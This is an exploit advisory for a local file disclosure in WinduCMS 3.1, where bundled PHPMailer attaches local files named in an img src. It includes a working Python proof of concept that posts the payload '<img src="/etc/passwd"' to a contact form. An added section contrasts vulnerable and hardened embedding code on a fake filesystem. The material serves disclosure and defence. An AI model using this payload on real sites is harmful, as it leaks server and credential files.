WinduCMS 3.1 Local File Disclosure

2017.12.04
Credit: Maciek Krupa
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python
#
# Exploit Title: WinduCMS <= 3.1 - Local File Disclosure
# Date: 2017-12-03
# Exploit Author: Maciek Krupa
# Vendor Homepage: http://windu.org
# Version: 3.1
# Tested on: Linux Debian 9
#
# // Description //
#
# A Local File Disclosure vulnerability exists in WinduCMS through the vulnerable
# PHPMailer version 5.2.1 bundled with it: PHPMailer's msgHTML() turns the src of
# every <img> tag in the message body into an embedded attachment, so a local
# path in the src attribute makes the mailer attach that file to the outgoing mail.
#
# // PoC //
#
# It requires a contact form present on the website.
#
# Example: {{W name=contactForm inputs="name" email="root@localhost"}}
#

from requests_toolbelt import MultipartEncoder
import requests

print("WinduCMS <= 3.1 Exploit")

# Contact form endpoint of the target installation
url = 'http://localhost/contact_page?mn=contactform.message.negative'
email = 'attacker@example.com'
# The message body is rendered as HTML; the local path in src is what gets attached
# (the tag deliberately has no closing '>', PHPMailer's src scan matches it anyway)
payload = '<img src="/etc/passwd"'
# Name of the text input declared in the contactForm template tag (inputs="name")
form_input = 'name'
fields = {'form_key': 'contactForm', form_input: 'Attacker', 'email': email, 'content': payload}
m = MultipartEncoder(fields=fields, boundary='----WebKitFormBoundary1500777958139315')
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0',
           'Content-Type': m.content_type}

print('Sending payload to target...')
r = requests.post(url, data=m.to_string(), headers=headers)
# A 200 only means the form accepted the submission; the disclosed file travels
# inside the e-mail the form sends, not in this HTTP response.
if r.status_code == 200:
    print('Exploited.')
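The mechanism behind the payload, as an added example that is not part of the advisory and not PHPMailer's or WinduCMS's own code: a simplified reconstruction of what an HTML-to-mail converter does when it rewrites `<img src>` into embedded attachments, with the vulnerable pattern beside a hardened one. The in-memory "filesystem", the paths in it and the regexes are constructed for the illustration; a real mailer reads the disk and should resolve symlinks with os.path.realpath before the containment check.

```python
import posixpath
import re
from typing import Dict, List, Tuple

# Constructed, in-memory stand-in for the web server's disk (hypothetical paths
# and contents; nothing here is read from a real machine).
FAKE_FS: Dict[str, bytes] = {
    "/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
    "/var/www/site/config.php": b"<?php $db_password = 'hunter2';\n",
    "/var/www/site/img/logo.png": b"\x89PNG\r\n\x1a\n<logo bytes>",
}

# Scan for src attributes the way an HTML-to-mail converter does. The pattern
# does not require the tag's closing '>', which is why the PoC payload
# '<img src="/etc/passwd"' (no '>') still matches.
IMG_SRC_RE = re.compile(r'<img[^>]*?src\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:', re.IGNORECASE)   # http:, data:, cid: ...
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def embed_images_vulnerable(html: str, basedir: str,
                            fs: Dict[str, bytes] = FAKE_FS) -> List[Tuple[str, bytes]]:
    """Vulnerable pattern: every non-URL src is joined to basedir and attached.

    posixpath.join(basedir, "/etc/passwd") discards basedir because the second
    argument is absolute, and "../" segments walk out of basedir, so whoever
    writes the message body chooses which server file ends up in the mail.
    """
    attachments = []
    for src in IMG_SRC_RE.findall(html):
        if SCHEME_RE.match(src):
            continue                      # remote or inline image: left alone
        path = posixpath.normpath(posixpath.join(basedir, src))
        if path in fs:
            attachments.append((posixpath.basename(path), fs[path]))
    return attachments


def embed_images_hardened(html: str, basedir: str,
                          fs: Dict[str, bytes] = FAKE_FS) -> List[Tuple[str, bytes]]:
    """Hardened pattern: relative paths with an image extension, confined to basedir."""
    root = posixpath.normpath(basedir)
    attachments = []
    for src in IMG_SRC_RE.findall(html):
        if SCHEME_RE.match(src):
            continue
        if src.startswith("/"):
            continue                      # absolute paths are never images of the site
        if posixpath.splitext(src)[1].lower() not in ALLOWED_EXT:
            continue                      # only attach things that look like images
        path = posixpath.normpath(posixpath.join(root, src))
        if not path.startswith(root + "/"):
            continue                      # "../" escaped the image directory
        if path in fs:
            attachments.append((posixpath.basename(path), fs[path]))
    return attachments


if __name__ == "__main__":
    body = '<img src="/etc/passwd"'      # the PoC payload from the advisory
    print("vulnerable:", [name for name, _ in embed_images_vulnerable(body, "/var/www/site")])
    print("hardened:  ", [name for name, _ in embed_images_hardened(body, "/var/www/site")])
```

Run against the advisory's payload, the vulnerable converter attaches passwd while the hardened one attaches nothing; a legitimate `<img src="img/logo.png">` under the site root is attached by both, and a `../config.php` reference is only followed by the vulnerable one. The three checks in the hardened version are independent: dropping the extension check alone would still let `../../etc/passwd.png`-style names out if a matching file existed, and the containment check is what stops them.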


Copyright 2017, cxsecurity.com